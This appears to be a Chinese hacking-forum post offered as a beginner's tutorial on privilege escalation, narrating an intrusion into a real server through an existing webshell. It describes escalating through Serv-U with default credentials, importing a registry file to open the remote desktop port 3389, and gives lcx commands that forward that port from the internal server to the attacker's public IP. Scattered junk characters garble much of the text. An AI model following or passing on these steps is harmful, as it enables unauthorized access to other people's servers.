- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
原创作者:huar 9 e/ F( o/ K: Q( ?' D. O9 _
原创出处:3.A.S.T 网络安全技术团队
. N. T8 P$ ^. g, O$ c1 m3 @& t6 m8 L5 I2 C, P
简单的提权教程,希望给还不会提权的兄弟们简单介绍下。
0 v [7 W3 Y& E. }7 ]3 [0 Q$ L之前的一个shell,在翻看记事本的时候找到的,大致看了下,shell权限还是非常大的,于是就试试提下权。
4 e1 V' M8 \9 h. F* G9 A L+ F& ` y4 S- m1 V
提权方法:SERU-U+LCX端口转发+注册表开3389端口+ n' N+ P& ~6 Z5 J# H
4 Z: d. Z) `3 t( F: [+ ?1 ^
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先上传个cmd试下可以运行,在查看服务器开的端口时,发现服务器开了4899、43958等端口,是没有开3389端口的(截图提权之前未截取,抱歉``)。 于是我就试下常用的Serv-U提权了,如果管理员大叔照顾我们这些小菜的话,那就太好了..
- M3 K( w- b' V; f% T8 y% g* E9 v9 Q, [
' f2 ?- G5 b& d+ F9 {* M- h9 S
2 M+ @( K9 F5 R. J9 x' T) ]. \+ d/ n; ]* f
先用默认账号密码试试,不过很幸运的是用默认账号密码提权成功了,嘿嘿``没想到管理员大叔这么照顾俺们这些小菜..接下来的路就好走多了~~! t6 |/ e# @! n6 ]2 r
) j5 E+ k# y% O, H6 d
前面说了,服务器是没有开3389端口的,工欲善其事必先利其器,由于现在我手中没有免杀的开3389端口的工具,所以我们就想想其它的办法吧``最后想了下,我们可以用导入注册表的方法开启服务器的3389服务端口,最后上传个开3389的注册表文件,在Serv-U命令下成功导入,3389端口成功开启.
' T$ g/ x) E: J$ r4 f7 Q \0 |
1 e$ }$ R* U1 y/ K' N# V4 i* ]8 ~还有就是服务器是在内网了,那我们就要用LCX做端口转发。$ s8 A5 p4 e6 z7 Q q$ r
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) 33890 h% L& c. Z2 n( h+ x
本地机器运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
; ~ P+ J) |2 U+ Q# Z* W
- C# O6 c( m7 @3 {5 u$ Q+ x具体的可以参考下呆呆版主做的视频教程,做的非常详细,在这里就不再多说什么了。
, H+ {5 l$ z3 B' u) ?3 p( b7 G- I1 D( e! Y5 K2 e4 ]0 f
& I) e; M& j D K& _* }% [, M
最后就是我的机器也在内网,LCX 转发端口到本地必须用公网ip,这个好办,路由器里有DMZ,可以用下这个功能的``嘿嘿~~# |" G! \4 ]' O: Z8 x" K/ x
6 W) I* t. i1 m @% f! W+ C( B, X1 f
3 j+ n9 e6 ~7 h3 P# E/ k. c4 N
; C# w/ `! p) M5 p: z& s1 C! M
最后远程连接成功```
8 [6 x# y- O) n1 ?6 O6 h9 G) ]1 i" n6 s! ]# b0 `) U
! R: O' w. M+ r* L9 ~) X
# j0 Z2 x; W! k$ q- |' M( N前几天还在议论INTEL和AMD的服务器处理器的问题呢``这次就遇见个AMD的服务器,嘿嘿`````
7 u( c, N7 I. A- x: A2 O* f% S感觉速度还可以```` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|